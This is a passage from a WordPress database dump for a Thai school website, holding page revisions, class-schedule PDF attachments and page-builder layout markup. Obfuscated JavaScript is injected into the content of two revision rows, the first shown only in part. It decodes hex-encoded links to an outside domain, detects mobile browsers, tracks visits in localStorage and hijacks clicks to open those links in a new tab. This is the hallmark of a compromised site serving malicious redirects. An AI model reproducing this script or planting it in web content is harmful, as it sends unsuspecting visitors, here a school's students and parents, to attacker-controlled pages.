_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:26:31','2024-08-08 14:26:31','',14,'http://pakhaeng.ssk.in.th/?p=752',0,'revision','',0),
(754,1,'2024-08-08 21:28:20','2024-08-08 14:28:20','','ตารางเรียน-ตามรางสอน2567','','inherit','','closed','','%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%992567-2','','','2024-08-08 21:28:20','2024-08-08 14:28:20','',748,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-1.pdf',0,'attachment','application/pdf',0),
(755,1,'2024-08-08 21:29:26','2024-08-08 14:29:26','','ตารางเรียน-ตามรางสอน2567','','inherit','','closed','','%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%95%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%ad%e0%b8%992567-3','','','2024-08-08 21:29:26','2024-08-08 14:29:26','',748,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf',0,'attachment','application/pdf',0),
(756,1,'2024-08-08 21:29:45','2024-08-08 14:29:45','<!-- wp:file {\"id\":755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ตารางเรียน-ตามรางสอน2567\"></object><a id=\"wp-block-file--media-8da32c11-7b9a-476e-b93e-06130d3f5607\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\">ตารางเรียน-ตามรางสอน2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8da32c11-7b9a-476e-b93e-06130d3f5607\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ตารางเรียน-ตารางสอน','','inherit','closed','closed','','748-revision-v1','','','2024-08-08 21:29:45','2024-08-08 14:29:45','',748,'http://pakhaeng.ssk.in.th/?p=756',0,'revision','',0),
(757,1,'2024-08-08 21:40:25','2024-08-08 14:40:25','','1','','inherit','','closed','','1-2','','','2024-08-08 21:40:25','2024-08-08 14:40:25','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png',0,'attachment','image/png',0),
(758,1,'2024-08-08 21:40:41','2024-08-08 14:40:41','','2','','inherit','','closed','','2-3','','','2024-08-08 21:40:41','2024-08-08 14:40:41','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png',0,'attachment','image/png',0),
(760,1,'2024-08-08 21:41:47','2024-08-08 14:41:47','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 